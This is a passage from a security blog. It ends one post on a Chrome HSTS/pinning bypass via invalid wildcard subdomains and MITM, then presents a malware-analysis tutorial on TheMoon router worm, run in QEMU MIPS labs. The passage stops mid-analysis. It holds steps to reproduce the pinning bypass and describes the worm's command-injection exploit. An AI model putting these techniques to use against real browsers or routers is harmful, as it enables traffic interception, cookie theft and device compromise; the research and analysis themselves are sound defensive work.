<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9PU0UPsbdu1oi-uhwz2Vu04OLOwT0jMs4EvxdQb3sPpb73c0UIDF_2jdBB0DNIuSMa_TVAGPNnBIt11C3hQtbBx6ozXeZuP0fEKNarXFR4d1QFQeibxwrNzjqEYAs8DovUG3f0HF473SF/s1600/pinning1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9PU0UPsbdu1oi-uhwz2Vu04OLOwT0jMs4EvxdQb3sPpb73c0UIDF_2jdBB0DNIuSMa_TVAGPNnBIt11C3hQtbBx6ozXeZuP0fEKNarXFR4d1QFQeibxwrNzjqEYAs8DovUG3f0HF473SF/s1600/pinning1.PNG" height="302" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWgwb2pHhgz6ZdCgeXLQPSBVcaEOwvk2TjUa0fyVfYTctlGrEHj7YDnNct9cXHav4fbgTi0NLJn7acPORcYA5FkQRNOwgTTOqUCqkAJtgMBCtITU5bOH6BtUSrwc2tlwDZgxiy7BtYmR4W/s1600/pinning2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWgwb2pHhgz6ZdCgeXLQPSBVcaEOwvk2TjUa0fyVfYTctlGrEHj7YDnNct9cXHav4fbgTi0NLJn7acPORcYA5FkQRNOwgTTOqUCqkAJtgMBCtITU5bOH6BtUSrwc2tlwDZgxiy7BtYmR4W/s1600/pinning2.PNG" height="230" width="640" /></a></div>
<br />
You can easily reproduce this on Chrome prior to v31: proxy Chrome through OWASP ZAP (accepting its certificate), visit URL’s like https://sites.google.com and Chrome will display a “heightened security” error message. If you type URL’s like https://www-.sites.google.com or https://www-.plus.google.com Chrome offers the option to “Proceed anyway”. If you're in Turkey right now you don't need to do nothing, the <a href="http://googleonlinesecurity.blogspot.com.br/2014/03/googles-public-dns-intercepted-in-turkey.html">Turkish Telecom does all the MITM job for you</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR5SCzjMUKsQbS5Dn_Cr3E-2KhDswCdP4AY3s8zP8TT9PJ-uTdHjps__iDOCHMgQnEuMZsNZlKc2BifDTcQBeB2ts_lWKSQjqJKZOpar416FKJ42uhJnZITiQh3vfjVv5V8u6bwkEIt2me/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR5SCzjMUKsQbS5Dn_Cr3E-2KhDswCdP4AY3s8zP8TT9PJ-uTdHjps__iDOCHMgQnEuMZsNZlKc2BifDTcQBeB2ts_lWKSQjqJKZOpar416FKJ42uhJnZITiQh3vfjVv5V8u6bwkEIt2me/s1600/1.PNG" height="604" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkh7YF2XCwPMGdRRznA_yY5y7O3LBmuYz9q-C2ZeJidibJc6lkQew1PyWUcLaxfxDbym5yc-yWiOMGMR5FCQqjNVyK8MIxpTVHQxq5LNu5EVVVG2EbTNOlbJZS0FMBOQpzRJLewd4G_Td0/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkh7YF2XCwPMGdRRznA_yY5y7O3LBmuYz9q-C2ZeJidibJc6lkQew1PyWUcLaxfxDbym5yc-yWiOMGMR5FCQqjNVyK8MIxpTVHQxq5LNu5EVVVG2EbTNOlbJZS0FMBOQpzRJLewd4G_Td0/s1600/2.PNG" height="602" width="640" /></a></div>
<br />
It's worth mentioning that when you issue a wildcard certificate for your host, it will be valid for a single level only. Certificates issued to *.google.com should not be trusted when used on domains like abc.def.google.com.<br />
<br />
The hardcoded list of domains and pinned certificates from Chrome can be found here:<br />
<br />
- <a href="https://src.chromium.org/viewvc/chrome/trunk/src/net/http/transport_security_state_static.json">https://src.chromium.org/viewvc/chrome/trunk/src/net/http/transport_security_state_static.json</a><br />
<br />
During my analysis, I found that 55 out of 397 domains with Transport Security enabled had wildcard entries on their DNS. A nation sponsored attacker, with a <a href="https://twitter.com/lucabruno/status/450239917000781825">valid and trusted CA</a> could simply MITM your traffic and inject requests to these invalid domains, circumventing the HSTS policies and stealing session cookies, for example.<br />
<br />
Google did not assign a CVE for that bug, but they fixed that within a couple of weeks. Chrome 32 and 33+ (the one that changed the SSL warning from red to yellow) are not affected by this issue.<br />
<br />
In times of <a href="https://www.imperialviolet.org/2014/02/22/applebug.html">Goto fails</a>, it was really interesting to follow the Chromium's tracker, their internal discussions, tests performed and so on. The commits fixing these issues can be found <a href="https://codereview.chromium.org/54623005/">here</a>.<br />
<br />
<b>Conclusion</b><br />
<br />
Google and Facebook security teams were both great to deal with. The bug was quite fun as well because it was different from the traditional OWASP Top 10 issues.<br />
<br />
And because the industry totally <a href="http://blog.secureideas.com/2013/09/industry-issues-new-vulnerabilities-and.html">needs new Vulnerability terminologies</a>, anyone willing to refer to these attacks shall name them Advanced Persistent Cross Site Wildcard Domain Header Poisoning (or simply APCSWDHP).<br />
<br />
In case you're from NSA and want to use this technique to implant our DNS's, please use the codename CRAZY KOALA so we could better track them when the next Snowden leaks your documents.<br />
<br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com9tag:blogger.com,1999:blog-3296471108082693838.post-71344830936826191922014-02-17T11:10:00.000-03:002014-02-18T09:43:31.280-03:00Analyzing Malware for Embedded Devices: TheMoon Worm<div>
All the media outlets are reporting that Embedded Malware is becoming mainstream. This is something <a href="http://dronebl.org/blog/8">totally new</a> and we <a href="http://internetcensus2012.bitbucket.org/paper.html">never heard of this before</a>, right? The high number of Linux SOHO routers with Internet-facing administrative interfaces, the lack of firmware updates and the ease to craft exploits make them a perfect target for online criminals. The <a href="http://blog.ioactive.com/2014/02/internet-of-threats.html">Internet of Threats is wildly insecure</a>, but definitely not unpatchable.</div>
<div>
<br /></div>
<div>
To all infosec people out there, it's important to understand these threats and report it properly to the media. Some top-notch researchers recently uncovered "Massive Botnets" infecting refrigerators, microwaves, gaming consoles, soda machines and tamagotchis. The problem is that they never provided any sort of evidence, no malware samples, no IOC's and did not write a <a href="http://attrition.org/errata/charlatan/hakin9/hakin9-nmap-ebook-ch1.pdf">Hakin9 article</a> describing it.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdgBF8zLF2t8wtF0TarU9sAYTJ-Pkt2nwCSWLh4LDebaN-Wu_msi1Bj4H059Kq7WfHAy__3ycEnR-PDbmX7AwO4I9gBysvK9yvTpuRpxHOh8sxi_xVUNCkw948tBdXEMeBwJPJ_0S0Dtoi/s1600/routerz.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdgBF8zLF2t8wtF0TarU9sAYTJ-Pkt2nwCSWLh4LDebaN-Wu_msi1Bj4H059Kq7WfHAy__3ycEnR-PDbmX7AwO4I9gBysvK9yvTpuRpxHOh8sxi_xVUNCkw948tBdXEMeBwJPJ_0S0Dtoi/s1600/routerz.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Refrigerator Botnet? Revd. Pastor Laphroaig says <a href="https://archive.org/details/Pocorgtfo02">Show the PoC || GTFO</a></span></td></tr>
</tbody></table>
<br />
<div>
The aim for this post is to provide more information to identify/execute embedded binaries, describing how to set your own virtual lab. In case you missed it, head to the first post from the "<a href="http://w00tsec.blogspot.com.br/2013/09/analyzing-and-running-binaries-from.html">Analyzing and Running binaries from Firmware Images</a>" series.</div>
<div>
<br /></div>
<div>
<b>TheMoon Worm</b></div>
<div>
<br /></div>
<div>
<a href="https://twitter.com/johullrich">Johannes</a> from SANS provided me a sample from "TheMoon" malware and posted some interesting information on their <a href="https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630">handler's diary</a>. Their honeypots captured the scanning activity and <a href="https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633">linked the exploit</a> to a vulnerable CGI script running on specific firmwares from the following Linksys routers: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000,E900.<br />
<br />
SANS handlers classified TheMoon as a Worm because of the self-replicating nature of the malware. The worm searches for a "HNAP1" URL to fingerprint and identify potentially vulnerable routers. If you check your FW and Server logs you may find lot's of different IP's probing this URL.<br />
<br />
The worm was named like this because it contains images from the movie "The Moon". It's possible to carve a few PNG's inside the ELF binary:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEoKL3kCkrCclEosMQRoIflCIplhNfgWofQW15ObPSZthjDHCKDLOvvgrUxe-eGhJIdTNUEGYo22-llhn3LrMckHIpXuQMH3er1PcXYzK2RdVaXWNP9vAEfZ5w5lH6iyhxOQtzfk-oQGTS/s1600/shtt.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEoKL3kCkrCclEosMQRoIflCIplhNfgWofQW15ObPSZthjDHCKDLOvvgrUxe-eGhJIdTNUEGYo22-llhn3LrMckHIpXuQMH3er1PcXYzK2RdVaXWNP9vAEfZ5w5lH6iyhxOQtzfk-oQGTS/s1600/shtt.PNG" height="276" width="320" /></a></div>
<div>
<br /></div>
</div>
<div>
<b>Identifying the Binary</b></div>
<div>
<br />
A total of seven different samples were provided: they all seem to be variants from the same malware due to the ssdeep matching score.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDhTHp27D3YDa0amPkxVHcjIyOyGMR6UObYbRwJouV9zMuKO1Ll5qFTJgExF4OymZimXte50coy0k5kcKDqbrWltHQODwOcd18PHIGHwlWBFPAEpidO2rrhS0rzOaFJevDMxdmt05SCT89/s1600/Screenshot+from+2014-02-15+23%5E%2516%5E%2555.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDhTHp27D3YDa0amPkxVHcjIyOyGMR6UObYbRwJouV9zMuKO1Ll5qFTJgExF4OymZimXte50coy0k5kcKDqbrWltHQODwOcd18PHIGHwlWBFPAEpidO2rrhS0rzOaFJevDMxdmt05SCT89/s1600/Screenshot+from+2014-02-15+23%5E%2516%5E%2555.png" height="346" width="640" /></a></div>
<br />
Let's start by running the file utility and readelf to identify the architecture (MIPS R3000 / Little Endian):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW5TRNaB4JUdp6DVTBfI4NSlHL1UmGTD9g2ZWbqBj1271ioxm61nh988wEYH-yrjjCgOFdK0vViXrb5r71NVx2IQAQImOGcSDEIxqq2AYMW8sOK60JMpMRP9tRa3x2cikBERZZqmdJKcoc/s1600/Screenshot+from+2014-02-15+23%255E%252519%255E%252508.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW5TRNaB4JUdp6DVTBfI4NSlHL1UmGTD9g2ZWbqBj1271ioxm61nh988wEYH-yrjjCgOFdK0vViXrb5r71NVx2IQAQImOGcSDEIxqq2AYMW8sOK60JMpMRP9tRa3x2cikBERZZqmdJKcoc/s1600/Screenshot+from+2014-02-15+23%255E%252519%255E%252508.png" height="410" width="640" /></a></div>
<br /></div>
<div>
The EXr.pdf variant (MD5 88a5c5f9c5de5ba612ec96682d61c7bb) had a <a href="https://www.virustotal.com/en/file/1ef6b45a2e5e6b547df2f5672bf48ebfd2720ffa8eed308010fb90f6fd8d79b6/analysis/1392517591/">VirusTotal Detection Rate of 3 / 50</a> on 2014-02-16.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2SA9G0XdBrI0uDhLMGr1uq3w7KCdCd2QOHfoq319LEYn7OEShgvxYJps1TF9yogkASHiIvUva-O80phUAEjs9-wZ95_JL789tC3718oQ23PBWIdc0HMI74WN6qfqWNJBCgqQv3b8JCl3d/s1600/vt.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2SA9G0XdBrI0uDhLMGr1uq3w7KCdCd2QOHfoq319LEYn7OEShgvxYJps1TF9yogkASHiIvUva-O80phUAEjs9-wZ95_JL789tC3718oQ23PBWIdc0HMI74WN6qfqWNJBCgqQv3b8JCl3d/s1600/vt.PNG" height="331" width="640" /></a></div>
<br />
<br />
<b>QEMU</b></div>
<div>
<br />
We'll be using QEMU to run the binaries on a controlled environment. I commonly use two different setups to run MIPS Linux binaries, both based on the <a href="https://dev.openwrt.org/wiki/malta">Malta</a> platform.<br />
<br />
<b>OpenWRT MIPS</b><br />
<br />
OpenWRT Malta CoreLV platform is intended to be used with QEMU (in big or little endian mode). The install procedure is pretty straightforward using <a href="http://wiki.openwrt.org/doc/howto/buildroot.exigence">OpenWRT Buildroot</a>. OpenWrt Buildroot is the buildsystem for the distribution and it works on Linux, BSD or MacOSX. In case you didn't remember, authors from <a href="http://internetcensus2012.bitbucket.org/paper.html">Carna Botnet</a> used it to cross-compile its binaries.<br />
<br />
Installing prerequisites (on your favorite <a href="http://anonscm.debian.org/gitweb/?p=collab-maint/debmirror.git;a=commitdiff;h=fcd972395b0201fcde4915d282982926f0d04c56;hp=7fcdf0d225c480b386c5a1f487e68dc39b57e771">Debian Derivative</a>):<br />
<br />
<script src="https://gist.github.com/bmaia/9042465.js"></script>
Now head to the openwrt folder and set the proper settings for your Linux Kernel, choosing "MIPS Malta CoreLV board (qemu)" for the Target System and "Little Endian" for the subtarget. Don't forget to save the config.<br />
<br />
<script src="https://gist.github.com/bmaia/9042489.js"></script><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6zcmFtobY9C85J6v1x0SxgsFhz-ZfFhL0kDho2S4uQdWnQXFvnJtvb4KNzQ3hSjzMQVyxMTLllwgBR2sAgzigWTmBibsZT_0FyY0qyHJmjJAj5CfgyuQA_hiAXS41b3isNIYrTZcjQfE6/s1600/Screenshot+from+2014-02-16+01%5E%2552%5E%2552.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6zcmFtobY9C85J6v1x0SxgsFhz-ZfFhL0kDho2S4uQdWnQXFvnJtvb4KNzQ3hSjzMQVyxMTLllwgBR2sAgzigWTmBibsZT_0FyY0qyHJmjJAj5CfgyuQA_hiAXS41b3isNIYrTZcjQfE6/s1600/Screenshot+from+2014-02-16+01%5E%2552%5E%2552.png" height="419" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ3cMXVI4jEG3zDr6CNHQBcsNsAI8uFRvY8HwBu-A3tuyb5vU2pzem7IaESVUxWi_rCBefYffUgVrmKE9fwgZVo6-rvUdZPH5Y0N2B1UElrWW9F31V8y1D5l1dj28O3btFhyXKmLHDvQzl/s1600/Screenshot+from+2014-02-16+01%5E%2553%5E%2508.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ3cMXVI4jEG3zDr6CNHQBcsNsAI8uFRvY8HwBu-A3tuyb5vU2pzem7IaESVUxWi_rCBefYffUgVrmKE9fwgZVo6-rvUdZPH5Y0N2B1UElrWW9F31V8y1D5l1dj28O3btFhyXKmLHDvQzl/s1600/Screenshot+from+2014-02-16+01%5E%2553%5E%2508.png" height="420" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Now <a href="http://wiki.openwrt.org/doc/howto/build">build your image</a> (use the -j switch to speed up if you have multiple cores, e.g "-j 3"):<br />
<br />
<script src="https://gist.github.com/bmaia/9042500.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmqk1fnptPzy0XPjDif6M8-2yP0W-9fqQSLKhnZZ9vOT74tXD4bDjK0TVtWRyITscp4NVH_RipgjKVJxQTromFexXlpYNmA9KMd4ol6ONety5dyDpta_Dfy-07UoydxYJfl6JbWazAiDrt/s1600/Screenshot+from+2014-02-16+02%5E%2500%5E%2516.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmqk1fnptPzy0XPjDif6M8-2yP0W-9fqQSLKhnZZ9vOT74tXD4bDjK0TVtWRyITscp4NVH_RipgjKVJxQTromFexXlpYNmA9KMd4ol6ONety5dyDpta_Dfy-07UoydxYJfl6JbWazAiDrt/s1600/Screenshot+from+2014-02-16+02%5E%2500%5E%2516.png" height="403" width="640" /></a></div>
<br /></div>
<div>
Your image will be ready after a couple of minutes. Now you need to install QEMU full system emulation binaries and start it with the right command switches:<br />
<br />
<script src="https://gist.github.com/bmaia/9042808.js"></script></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS2PDVKZE9osgW4JkQLoAmZrYeUI0S77AGSCGTKunMMOOXpvHrJWNmYkDbeta_TtXQOkpaV2d7kB8x_Ou5OxJUUwy6WA1_NOukBwnDsuac6KvQwGrztJKpc9uXlllXUYXQWc2nAxSJahKl/s1600/Screenshot+from+2014-02-16+03%5E%2558%5E%2540.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS2PDVKZE9osgW4JkQLoAmZrYeUI0S77AGSCGTKunMMOOXpvHrJWNmYkDbeta_TtXQOkpaV2d7kB8x_Ou5OxJUUwy6WA1_NOukBwnDsuac6KvQwGrztJKpc9uXlllXUYXQWc2nAxSJahKl/s1600/Screenshot+from+2014-02-16+03%5E%2558%5E%2540.png" height="372" width="640" /></a></div>
<div>
<br /></div>
<div>
To exit the console simply hit CTRL+A followed by C and Q.<br />
<br />
If you want to connect your emulated machined to a real network, follow the steps from <a href="http://www.aurel32.net/info/debian_mips_qemu.php">Aurelien's Blog</a> or simply run the following commands to get Internet access:<br />
<br />
<script src="https://gist.github.com/bmaia/9042823.js"></script>
If you don't want to compile the Kernel by yourself, you can grab the pre-compiled binaries from <a href="http://downloads.openwrt.org/attitude_adjustment/12.09-rc1/malta/generic/">here</a> or <a href="http://www.cpe.ku.ac.th/~aphirak/malta/">here</a> (at your own risk).<br />
<br />
You may remember that it was not possible to run <a href="http://w00tsec.blogspot.com.br/2013/09/analyzing-and-running-binaries-from.html">busybox-simet</a> using the standalone qemu-mips-static. It's possible to fix that by manually patching QEMU or you can run it inside the proper virtual machine (OpenWRT Malta MIPS/Big Endian):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9kBOxXgFSJ6JZH67soSDhrThA8Pyr6uE5Y1dTZNxyNMkX0BdhtyrD6L7JrkrdQ9z5h_xToP_eKXWHmOvHOBAUKL-8BkuEBOLLpGHJr8v1UgACQVpyDKnrmmsMV68FO5fmZ73WcAIxjGXT/s1600/Screenshot+from+2014-02-16+04%5E%2518%5E%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9kBOxXgFSJ6JZH67soSDhrThA8Pyr6uE5Y1dTZNxyNMkX0BdhtyrD6L7JrkrdQ9z5h_xToP_eKXWHmOvHOBAUKL-8BkuEBOLLpGHJr8v1UgACQVpyDKnrmmsMV68FO5fmZ73WcAIxjGXT/s1600/Screenshot+from+2014-02-16+04%5E%2518%5E%2529.png" height="372" width="640" /></a></div>
<br /></div>
<div>
<b>Debian MIPS Linux</b></div>
<div>
<br />
I won't describe how to set up your Debian MIPS Linux because <a href="https://twitter.com/zcutlip">Zach Cutlip</a> already did an amazing job describing it on <a href="http://shadow-file.blogspot.com.br/2013/05/running-debian-mips-linux-in-qemu.html">this blog post</a>. The process is quite similar to the OpenWRT one and if you're too lazy to build your own environment, <a href="http://www.aurel32.net/">Aurelien</a> provides pre-compiled binaries <a href="http://people.debian.org/~aurel32/qemu/mipsel/">here</a>. Don't forget to set you network connections properly<br />
<br />
<b>Dynamic Analysis</b><br />
<br />
In order to emulate the Linksys Environment, let's download and unpack the Firmware from E2500v2 (v1.0.07).<br />
<br />
<script src="https://gist.github.com/bmaia/9042835.js"></script>
Let's copy and extract the root filesystem (e2500.tar.gz) and the malicious binary (EXr.pdf) to our test machine (Debian MIPS). Remember to copy the worm to the appropriate "/tmp" folder. Backup your QEMU image, start sniffing the connections from the bridged network (tap1 on my case) and bind the necessary pseudo-devices to the chrooted path. You can run the binary directly on your Debian MIPS environment, but using chroot and the target filesystem is highly recommended. If you try to chroot and run the worm without linking these devices, it will refuse to run and it won't drop the second stage binary.<br />
<br />
<script src="https://gist.github.com/bmaia/9042842.js"></script>
You can use strace to log the syscalls and start your chrooted shell to run the malicious binary. I had some issues using strace on the 2.6.32 Debian MIPS Kernel (vmlinux-2.6.32-5-4kc-malta). The 3.2.0 (vmlinux-3.2.0-4-4kc-malta) version seems to be running fine.<br />
<br /></div>
<div>
<script src="https://gist.github.com/bmaia/9042862.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5FMjvyzFfFRo5BmA5UOeKE_-E0UCv5z8nlKdUkUGbSwHmXT3F4mnJTmDqqPuquMYGRV02ZhkdDfx2EZzGnwE2WHkIHT-c4kxBkKRLD5tvExGvxRxtFrWi8Rz4A2JyQ2-Qd3ADRoSyczH6/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5FMjvyzFfFRo5BmA5UOeKE_-E0UCv5z8nlKdUkUGbSwHmXT3F4mnJTmDqqPuquMYGRV02ZhkdDfx2EZzGnwE2WHkIHT-c4kxBkKRLD5tvExGvxRxtFrWi8Rz4A2JyQ2-Qd3ADRoSyczH6/s1600/Screenshot-Terminal.png" height="442" width="640" /></a></div>
<br />
If you don't want to use strace, simply start sh chrooted and run the malware:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7CAWKla5phBQuNyFIGKgNJmZM6OagOrH7hncHeU7gtoMBhG2wIWuE6JPkV6KMtTwLiE6-Log1KKAxsV54evve6i1yyHCj8ISMj52iMf-_dscSd0WoeT9KS2acukVcXsEXiqMfTa2rdndn/s1600/Screenshot-Terminal-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7CAWKla5phBQuNyFIGKgNJmZM6OagOrH7hncHeU7gtoMBhG2wIWuE6JPkV6KMtTwLiE6-Log1KKAxsV54evve6i1yyHCj8ISMj52iMf-_dscSd0WoeT9KS2acukVcXsEXiqMfTa2rdndn/s1600/Screenshot-Terminal-7.png" height="442" width="640" /></a></div>
<br />
The worm tries to remove files containing certain extensions and perform a series of system checks. After a few seconds the binary is removed from /tmp/ and three files are written on the disk: .L26 (PID), .L26.lunar (Lunar Base URL) and .L26.out (Debug log).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEismcoFD7TK-pDGuKH1OjpunT4hFrtH8zjyY6aN_e7GOabigmGe5kHyxq1YJcJWHPQN4ly9qJsSD7ben29kTu0kOfZ86xgDyl3guE3jjsamHf8zYFHi6Mh0TZwe3XiwM5ANz6O4M5qudFKo/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEismcoFD7TK-pDGuKH1OjpunT4hFrtH8zjyY6aN_e7GOabigmGe5kHyxq1YJcJWHPQN4ly9qJsSD7ben29kTu0kOfZ86xgDyl3guE3jjsamHf8zYFHi6Mh0TZwe3XiwM5ANz6O4M5qudFKo/s1600/Screenshot-Terminal-5.png" height="416" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<script src="https://gist.github.com/bmaia/9042570.js"></script>
It's possible to dump QEMU's physical memory using the <a href="http://doc.opensuse.org/products/draft/SLES/SLES-kvm_sd_draft/cha.qemu.monitor.html"><span id="goog_1832131169"></span>pmemsave</a> command by hitting CTRL+A, C (to enter QEMU's administrative interface) and entering:<br />
<br />
<script src="https://gist.github.com/bmaia/9042866.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZTE2LjeKw6mPip-AiaKPCbA4Wq7CoKaZ6jhSzj4UCHEWDTF_95Lu_8yBD4DdzC3ng5xazuuQiyLG53uHVVdayVplxpJI8qfKU8_FHW_zfPRuv9i6dHFWXc7J9MfMpFumdWWQ5Wa87slgG/s1600/Screenshot-Terminal-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZTE2LjeKw6mPip-AiaKPCbA4Wq7CoKaZ6jhSzj4UCHEWDTF_95Lu_8yBD4DdzC3ng5xazuuQiyLG53uHVVdayVplxpJI8qfKU8_FHW_zfPRuv9i6dHFWXc7J9MfMpFumdWWQ5Wa87slgG/s1600/Screenshot-Terminal-16.png" height="164" width="640" /></a></div>
<br />
The 256MB raw dump will be saved on your host's local path. You can now try to use volatility or run strings against it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkhQrlo4pFYzHpxAQXuucWa9B_2d4YMGYnRtYvIaiXEMO2s7CHhdt2fXJ-4NcB8Mxv9Elv1n2uK-gI90u95TgtAqOltO3gFYKzH2uQHuIErqVhhdzbjYUH07407MLstJQg9cMW6RgFw3h3/s1600/Screenshot-Terminal-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkhQrlo4pFYzHpxAQXuucWa9B_2d4YMGYnRtYvIaiXEMO2s7CHhdt2fXJ-4NcB8Mxv9Elv1n2uK-gI90u95TgtAqOltO3gFYKzH2uQHuIErqVhhdzbjYUH07407MLstJQg9cMW6RgFw3h3/s1600/Screenshot-Terminal-6.png" height="441" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw5nBdqD7b3XLR6eoe8GrRVe-q_Gd-mgF58u-V4PzhBUJe3kN_Fvslo5ILk-nDNcYIl5sGRzO-kZjno1C0gyig3WST9RLRwVy3sp0VTkehXROSSEfDH2HQw_GAqcN7BADTYEK8W3myhXdq/s1600/Screenshot-Terminal-10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw5nBdqD7b3XLR6eoe8GrRVe-q_Gd-mgF58u-V4PzhBUJe3kN_Fvslo5ILk-nDNcYIl5sGRzO-kZjno1C0gyig3WST9RLRwVy3sp0VTkehXROSSEfDH2HQw_GAqcN7BADTYEK8W3myhXdq/s1600/Screenshot-Terminal-10.png" height="441" width="640" /></a></div>
<br />
The worm starts scanning for ports 80 and 8080 on a <a href="https://isc.sans.edu/diaryimages/moonnets">hardcoded list of networks</a>. If the /HNAP/ URL returns a string identifying the targeted routers, the malware sends a HTTP POST trying to <a href="http://www.exploit-db.com/exploits/31683/">exploit a command injection</a> on the vulnerable CGI.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
